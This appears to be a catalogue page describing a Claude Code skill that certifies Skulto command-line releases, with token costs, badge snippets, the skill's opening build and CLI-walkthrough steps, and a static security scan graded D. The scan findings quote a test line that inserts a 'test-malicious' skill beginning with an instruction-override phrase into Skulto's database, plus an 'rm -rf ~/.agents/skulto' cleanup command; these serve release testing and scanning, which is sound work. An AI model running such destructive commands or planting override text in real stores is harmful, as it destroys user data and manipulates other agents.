skulto-release-cert

skulto-release-cert is a skill for Claude Code from asteroid-belt/skulto. It costs 45 tokens per session (6,519 once invoked), scanned D, original, MIT.

A release-checking procedure for a Skulto command-line build intended for Homebrew, a package manager for macOS and Linux. It runs tests, checks multiple system builds, walks through the commands, and audits security before release.

In plain words
What is it for?
Use it to certify Skulto releases, verify Linux and macOS builds on different processor types, test the command-line interface from a clean state, and produce a certification summary.
Why use it?
It helps catch failed builds, broken command paths, and security issues before a version is tagged or published.

Skill for Claude Code

Written for Claude Code: installed under .claude/. Also seen: reads .claude/ paths.

Needs its repository: it runs a file that does not travel with it, so clone the repository first. The line is GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o /dev/null ./cmd/skulto.

Good fit Use it to certify Skulto releases, verify Linux and macOS builds on different processor types, test the command-line interface from a clean state, and produce a certification summary.

Compare 6 skills from other repositories ↓
Install

Getting it into your agent

It runs from inside its repository, so the clone comes first — what it calls does not travel with the file alone.

Clone the repo
git clone --depth 1 https://github.com/asteroid-belt/skulto
agentmods
npx agentmods add skills/asteroid-belt/skulto/skulto-release-cert

Made for: Claude Code.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for skulto-release-cert

README.md
[![agentmods](https://agentmods.dev/badge/skills/asteroid-belt/skulto/skulto-release-cert/github.svg)](https://agentmods.dev/skills/asteroid-belt/skulto/skulto-release-cert)
Your own site
<a href="https://agentmods.dev/skills/asteroid-belt/skulto/skulto-release-cert"><img src="https://agentmods.dev/badge/skills/asteroid-belt/skulto/skulto-release-cert/github.svg" alt="Measured on agentmods" height="20"></a>

Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.

agentmods 80×15 button for skulto-release-cert

Your own site · 80×15
<a href="https://agentmods.dev/skills/asteroid-belt/skulto/skulto-release-cert"><img src="https://agentmods.dev/badge/skills/asteroid-belt/skulto/skulto-release-cert.svg" alt="Reviewed on agentmods" width="80" height="20"></a>
Per session 45 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 6,519 The whole file, excluding the scripts and references it only reads on demand.
Security scan D 5 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00045 $0.06519
Opus 5 $0.00023 $0.03259
Sonnet 5 $0.00009 $0.01304
Haiku 4.5 $0.00005 $0.00652

Measured 12d ago against content hash e075c7fddf09, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-12, from the pricing page.

Security

Grade D, and why

skulto-release-cert scanned grade D with 5 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 12d ago.

The scan reads SKILL.md. This mod also ships 2 executable files (scripts/cert-pass1.sh, scripts/cert-pass2.sh), listed below but not scanned — reading those needs a real analyzer, not pattern matching.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Instruction-override phrasingmediumPrompt injection

Text telling the model to disregard its earlier instructions or safety rules is the shape of a prompt injection, whoever wrote it.

sqlite3 ~/.agents/skulto/skulto.db "INSERT OR REPLACE INTO skills (id, slug, title, content, source_id, security_status, threat_level, threat_summary) VALUES ('test-malicious', 'test-malicious', 'Test Malicious', 'Ignore

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Downloads and executes remote codemediumSupply chain

curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.

sqlite3 ~/.agents/skulto/skulto.db "INSERT OR REPLACE INTO skills (id, slug, title, content, source_id, security_status, threat_level, threat_summary) VALUES ('test-malicious', 'test-malicious', 'Test Malicious', 'Ignore

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Unrestricted tool accesslowExcessive agency

A wildcard tool grant or "run any command" leaves no least-privilege boundary at all.

| 4 | Run any command | `skulto check` — no errors, flag survives app startup |

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Recursive force deletemediumDestructive command

rm -rf with a variable or a broad path is one typo away from removing the wrong tree.

rm -rf ~/.agents/skulto

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Makes network callslowCapability

Not a fault in itself. Listed so you know the mod talks to something, and to what.

sqlite3 ~/.agents/skulto/skulto.db "INSERT OR REPLACE INTO skills (id, slug, title, content, source_id, security_status, threat_level, threat_summary) VALUES ('test-malicious', 'test-malicious', 'Test Malicious', 'Ignore
.claude/skills/skulto-release-cert/SKILL.md · 568 lines

How it starts

The opening of the file, as written. The whole thing — 568 lines — stays where its author put it; the contents beside it link to each section on GitHub.

Skulto Release Certification

Certify a build for Homebrew production release. Three passes, all must be green before shipping.

When to Use

Before tagging a release or updating the Homebrew tap. Run from the skulto repo root.

Pass 1: Unit Tests, Lint, and Cross-Compile

Build both binaries and verify all quality gates.

make build-all
make test
make lint
make format

Cross-compile all release targets:

GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o /dev/null ./cmd/skulto
GOOS=linux GOARCH=arm64 CGO_ENABLED=0 go build -o /dev/null ./cmd/skulto
GOOS=darwin GOARCH=amd64 CGO_ENABLED=0 go build -o /dev/null ./cmd/skulto
GOOS=darwin GOARCH=arm64 CGO_ENABLED=0 go build -o /dev/null ./cmd/skulto

All four must succeed.

Pass 2: CLI Command Walkthrough

Test every CLI code path against the built binary (./build/skulto).

State Snapshot (REQUIRED before any Pass 2 tests)

Capture the pre-cert state so it can be restored after testing. Run these BEFORE any commands:

# 1. Snapshot installed skills
skulto check > /tmp/skulto-cert-check-before.txt 2>&1

# 2. Backup skulto.json if it exists
cp skulto.json /tmp/skulto-cert-skulto.json.bak 2>/dev/null || true

# 3. Backup the database
cp ~/.agents/skulto/skulto.db /tmp/skulto-cert-skulto.db.bak

# 4. Record installed skill count for later comparison
echo "Snapshot taken: $(date)"

All subsequent sections MUST clean up their own test artifacts. The State Restore section at the end of Pass 2 verifies nothing leaked.

2a: Warm state (existing data)

Run each command and verify expected output:

Command Expected
skulto --help Shows usage, subcommands
skulto check Lists installed skills with platforms
skulto list Lists source repositories
skulto info <slug> Shows metadata, tags, install status
skulto favorites list Shows favorites or empty state
skulto favorites add <slug> Adds skill
skulto favorites remove <slug> Removes skill
skulto save Saves manifest or "No changes"
skulto save (again) "No changes" (idempotent)
skulto scan --pending Scans unscanned skills
skulto scan --skill <slug> Scans by slug (not just ID)
skulto pull Syncs all repos, reconciles
skulto update Pull + scan + summary
skulto discover Lists unmanaged skills
skulto install --help Shows usage
skulto install nonexistent -y "No platforms selected" (empty selection safety)
skulto uninstall --help Shows usage
skulto add --help Shows usage
skulto remove --help Shows usage
skulto ingest --help Shows usage
skulto feedback Shows feedback URL
skulto-mcp --help Shows MCP server usage

Read the full file on GitHub · 568 lines

Files

What ships with it

2 files beside SKILL.md in the same directory: the scripts, references and assets a skill reads on demand. Not counted in the per-session cost; read them before you install if any of them is executable.

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 12d ago First seen · 568 lines · 45 tokens per session scan D e075c7fddf09

Subscribe to this mod's changes

skulto-release-cert is a skill published in the GitHub repository asteroid-belt/skulto (50 stars, last pushed 5d ago), licensed MIT. It adds 45 tokens to every session and 6,519 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it D with 5 findings (instruction-override phrasing, downloads and executes remote code, unrestricted tool access). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-30.